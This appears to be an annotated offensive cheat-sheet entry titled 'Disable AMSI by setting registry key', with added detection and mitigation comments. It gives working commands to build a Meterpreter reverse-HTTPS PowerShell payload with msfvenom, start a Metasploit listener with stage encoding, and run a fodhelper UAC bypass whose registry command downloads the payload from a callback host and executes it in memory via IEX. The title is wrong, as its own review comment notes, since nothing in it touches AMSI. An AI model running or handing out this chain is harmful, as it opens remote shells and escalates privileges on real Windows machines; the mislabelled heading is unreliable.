Disable AMSI by setting registry key
# Builds a staged x64 Meterpreter reverse-HTTPS payload, emitted as PowerShell source (-f ps1) and written to rev.ps1 (-o).
# LHOST/LPORT are the callback address and port baked into the payload; 192.168.119.120 is an RFC 1918 (private) address.
# Defender view: rev.ps1 is only fetched and run by the registry command later on this page, so PowerShell script block
# logging (event 4104) and AMSI-integrated AV on the target are the controls that get to inspect its content.
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 -f ps1 -o rev.ps1
# Metasploit console input; several commands (use / set ... / run) appear to have been collapsed onto this one line.
# It configures exploit/multi/handler as the listener for the payload above, with the same payload type, lhost and lport.
# EnableStageEncoding with StageEncoder x64/zutto_dekiru encodes the second stage before it is sent, so network
# signatures that match the raw stage bytes are not a reliable control here. Detection should lean on endpoint
# telemetry (process lineage, script block logging) and on TLS/connection metadata for the outbound 443 session.
use exploit/multi/handler set payload windows/x64/meterpreter/reverse_https set lhost 192.168.119.120 set lport 443 set EnableStageEncoding true set StageEncoder x64/zutto_dekiru run
# Three PowerShell statements appear collapsed onto this one line: New-Item, New-ItemProperty, then a launch of fodhelper.exe.
# Together they match the known fodhelper UAC-bypass pattern (MITRE ATT&CK T1548.002): a per-user ms-settings "open"
# command is written under HKCU, a DelegateExecute string value with no data is added, and fodhelper.exe is started.
# The command stored in the key downloads rev.ps1 over plain HTTP and pipes it to IEX, so the script runs without being written to disk.
# NOTE(review): nothing on this line changes an AMSI setting; the key it writes is the ms-settings handler, so AMSI and
# script block logging still see the downloaded script unless something not shown on this page interferes.
# Detection: alert on creation of HKCU\Software\Classes\ms-settings\shell\open\command or a DelegateExecute value under it
# (Sysmon registry events 12/13), and on fodhelper.exe spawning powershell.exe or any other interpreter.
# Mitigation: set UAC to "Always notify", keep day-to-day accounts out of the local Administrators group, and restrict
# outbound HTTP/HTTPS from workstations to unknown hosts.
New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value "powershell.exe (New-Object System.Net.WebClient).DownloadString('http://192.168.119.120/rev.ps1') | IEX" -Force New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force C:\Windows\System32\fodhelper.exe